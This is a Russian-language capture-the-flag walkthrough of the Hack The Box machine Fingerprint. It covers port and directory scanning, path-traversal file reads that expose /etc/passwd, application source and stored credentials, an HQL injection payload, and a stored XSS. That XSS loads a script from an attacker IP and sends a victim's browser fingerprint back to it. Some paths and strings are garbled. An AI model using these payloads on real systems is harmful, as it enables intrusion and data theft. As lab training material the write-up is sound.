![](/uploads/posts/2022-08/05.png)
Все это — в рамках прохождения «безумной» по сложности машины Fingerprint с площадки Hack The Box.
Разведка
Сканирование портов
Добавляем IP-адрес машины в /
:
10.10.11.127 fingerprint.htb
И запускаем сканирование портов.
![Результат работы скрипта Результат работы скрипта](/uploads/posts/2022-08/02_Py79SMx.png)
Находим три открытых порта:
- 22 — служба OpenSSH 7.6p1;
- 80 — веб‑сервер Werkzeug httpd 1.0.1;
- 8080 — веб‑сервер GlassFish Open Source Edition 5.0.1.
Наша точка входа — это наверняка один из двух веб‑серверов. Но, изучив сайты, я ничего интересного не нашел. Давай тогда поищем скрытый контент.
Запускаем ffuf:
ffuf -uhttp://fingerprint.htb/FUZZ -t 256 -wdirectory_2.3_medium_lowercase.txt
![Результат сканирования каталогов с помощью ffuf Результат сканирования каталогов с помощью ffuf](/uploads/posts/2022-08/05.png)
ffuf -uhttp://fingerprint.htb:8080/FUZZ -t 256 -wdirectory_2.3_medium_lowercase.txt
![Результат сканирования каталогов с помощью ffuf Результат сканирования каталогов с помощью ffuf](/uploads/posts/2022-08/06.png)
Появляются новые интересные каталоги. Burp способен составлять карты сайта, чем мы и воспользуемся. В данном случае на построенной карте обнаружим конечные точки, которые мы бы долго искали при грубом сканировании.
![Карта сайта fingerprint.htb Карта сайта fingerprint.htb](/uploads/posts/2022-08/07.png)
Теперь важно найти место, откуда мы переходим к конечным точкам. История и поиск в Burp выводят нас на страницу /
.
![Burp History Burp History](/uploads/posts/2022-08/08.png)
Точка входа
LFI
Через страницу /
можно просматривать файлы, поэтому проверим, нет ли тут уязвимости чтения произвольных файлов в системе. Для перебора файлов я буду использовать Burp Intruder.
![Burp Intruder — вкладка Positions Burp Intruder — вкладка Positions](/uploads/posts/2022-08/09.png)
И простая последовательность /../..//
отобразит нам содержимое файла /
! Это также позволит нам узнать домашний каталог пользователя flask
. А это означает доступ к исходникам сервера!
![Содержимое файла /etc/passwd Содержимое файла /etc/passwd](/uploads/posts/2022-08/11.png)
Стоит попробовать получить содержимое некоторых стандартных файлов. Так, app/
ничего не выводит, а app/
все же дает код приложения (путь /
).
![Исходный код app.py Исходный код app.py](/uploads/posts/2022-08/12.png)
Теперь у нас есть ключ приложения (строка 19), а также видим импорт функции check
из модуля auth
(строка 8). Запросим этот файл:
/admin/view/../..//home/flask/app/auth.py
![Исходный код auth.py Исходный код auth.py](/uploads/posts/2022-08/13.png)
В строке 13 раскрывается файл базы данных с учетными данными. А в строке 16 с помощью функции build_safe_sql_where
формируется запрос. Сама функция импортируется из модуля util
. Получим следующие файлы:
/
admin/ view/../..// home/ flask/ app/ users. db /
admin/ view/../..// home/ flask/ app/ util. py
![Содержимое файла users.db Содержимое файла users.db](/uploads/posts/2022-08/14.png)
![Содержимое файла util.py Содержимое файла util.py](/uploads/posts/2022-08/15.png)
Из файла базы получаем учетные данные admin
:u_will_never_guess_this_password
. Используя их, можем авторизоваться на сайте и получить доступ к логам.
![Страница Logs Страница Logs](/uploads/posts/2022-08/16.png)
Больше здесь ничего добыть не можем.
HQL injection + XSS = fingerprint
Тогда попробуем авторизоваться с полученными учетными данными на другом сервисе. Конечно, там нас ждет неудача, но на странице логов размер файла увеличится.
![Страница Logs Страница Logs](/uploads/posts/2022-08/17.png)
А в самом файле будет указан адрес, логин и цифровой отпечаток пользователя, который попытался авторизоваться.
![Содержимое файла auth.log Содержимое файла auth.log](/uploads/posts/2022-08/18.png)
Так как логином и отпечатком мы можем оперировать при авторизации, есть возможность получить XSS. Но к этому вернемся чуть позже. На сервере используется база данных, а это значит, что стоит попробовать обойти аутентификацию. На GitHub есть много словарей типа auth bypass, и первая же нагрузка дает следующую ошибку.
![Ошибка сервера при обходе авторизации SQL Ошибка сервера при обходе авторизации SQL](/uploads/posts/2022-08/19.png)
Получаем ошибку JDBC, а это значит, что нужно выбрать нагрузки для HQL. Большая часть окажется заблокирована, но вот такая нагрузка дает результат:
xOR SUBSTRING(username,1,1)=aand =
Нам сообщают про неверный цифровой отпечаток (Invalid
).
![Сообщение о блокировке запроса Сообщение о блокировке запроса](/uploads/posts/2022-08/20.png)
Таким образом, нам нужно получить цифровой отпечаток администратора, в чем нам может помочь уязвимость XSS. Снова попытаемся авторизоваться на втором сервисе, но вместо фингерпринта отправим нагрузку:
<script src="http://10.10.14.156:4321/evil.js"></script>
Она будет загружать с нашего сервера скрипт с кодом alert(
.
![Запрос с нагрузкой XSS Запрос с нагрузкой XSS](/uploads/posts/2022-08/22.png)
![Проверка уязвимости XSS Проверка уязвимости XSS](/uploads/posts/2022-08/23.png)
Уязвимость присутствует, значит продолжаем. Обычно фингерпринт генерируется кодом на JS из множества параметров вроде размера экрана, названия и версии браузера и прочих признаков. Нам нужно найти этот код и записать в скрипт на нашем сервере. В Burp History можно увидеть загрузку скрипта login.
, он‑то нам и нужен.
![Содержимое login.js Содержимое login.js](/uploads/posts/2022-08/24.png)
Копируем содержимое скрипта и добавляем в конце код, который отправит сгенерированный фингерпринт на наш сервер:
location.href="http://10.10.14.156:4321/?id="+getFingerPrintID();
После повторного запроса на авторизацию получим фингерпринт на наш сервер.
![Логи локального веб-сервера Логи локального веб-сервера](/uploads/posts/2022-08/25.png)
Но и отправляя этот фингерпринт, мы получаем ту же ошибку: Invalid
.
![Ответ сервера Ответ сервера](/uploads/posts/2022-08/26.png)
Скачать:
Скриншоты:
Важно:
Все статьи и материал на сайте размещаются из свободных источников. Приносим свои глубочайшие извинения, если Ваша статья или материал была опубликована без Вашего на то согласия.
Напишите нам, и мы в срочном порядке примем меры.